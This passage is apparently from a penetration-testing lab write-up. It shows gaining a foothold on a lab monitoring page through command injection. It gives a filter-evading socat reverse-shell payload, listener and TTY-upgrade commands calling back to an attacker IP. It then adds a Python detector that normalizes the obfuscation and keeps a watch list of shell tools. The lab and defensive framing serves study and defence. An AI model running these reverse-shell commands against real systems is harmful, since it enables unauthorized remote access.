Foothold

We pick up where we left off, at the monitoring.inlanefreigt.local webpage. We can use this page to get a reverse shell by entering the following after the IP, on a new line:

's'o'c'a't'${IFS}TCP4:10.10.15.244:8443${IFS}EXEC:bash

We get a simple shell back. Now we need to get an interactive shell. We will use the socat method.

Starting a socat listener:

socat file:`tty`,raw,echo=0 tcp-listen:4443

On the simple shell we type:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.244:4443
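The input submitted after the IP at the start of this section gets past a keyword filter because bash drops the quotes and expands ${IFS} to whitespace before running the line. The following is an added example, not part of the original writeup or the target application: a server-side check that allowlists the IP field and, for logging, reports what the obfuscated value turns into. The function names, the watch list and the 127.0.0.1 prefix in the sample are assumptions made for illustration.

```python
import ipaddress
import re

_IFS = re.compile(r"\$\{IFS\}|\$IFS")   # expands to whitespace in bash
_QUOTES = re.compile(r"['\"\\]")        # removed by bash quote processing
_TOKEN = re.compile(r"[A-Za-z0-9_]+")

# Assumed watch list for this example; tune it to your environment.
WATCHED = {"socat", "bash", "nc", "sh"}

def normalize(value):
    """Approximate what the shell sees: ${IFS} -> space, quotes dropped."""
    return _QUOTES.sub("", _IFS.sub(" ", value))

def is_valid_ip_field(value):
    """Allowlist: the entire field must parse as one IP address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def findings(value):
    """Return the reasons a submitted IP field looks like command injection."""
    reasons = []
    if "\n" in value or "\r" in value:
        reasons.append("newline in field")
    if _IFS.search(value):
        reasons.append("${IFS} used as separator")
    raw = set(_TOKEN.findall(value))
    norm = set(_TOKEN.findall(normalize(value)))
    for cmd in sorted(WATCHED & norm):
        note = "" if cmd in raw else " (hidden by quoting)"
        reasons.append("command '%s'%s" % (cmd, note))
    return reasons

# Constructed sample: the 127.0.0.1 prefix is assumed, the second line is
# the value shown on this page.
SAMPLE = "127.0.0.1\n's'o'c'a't'${IFS}TCP4:10.10.15.244:8443${IFS}EXEC:bash"

if __name__ == "__main__":
    print("accepted:", is_valid_ip_field(SAMPLE))
    for reason in findings(SAMPLE):
        print("-", reason)
```

The allowlist check is the control; the findings list is only useful as a detection signal, since a deny list of command names can always be sidestepped the same way the original filter was.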
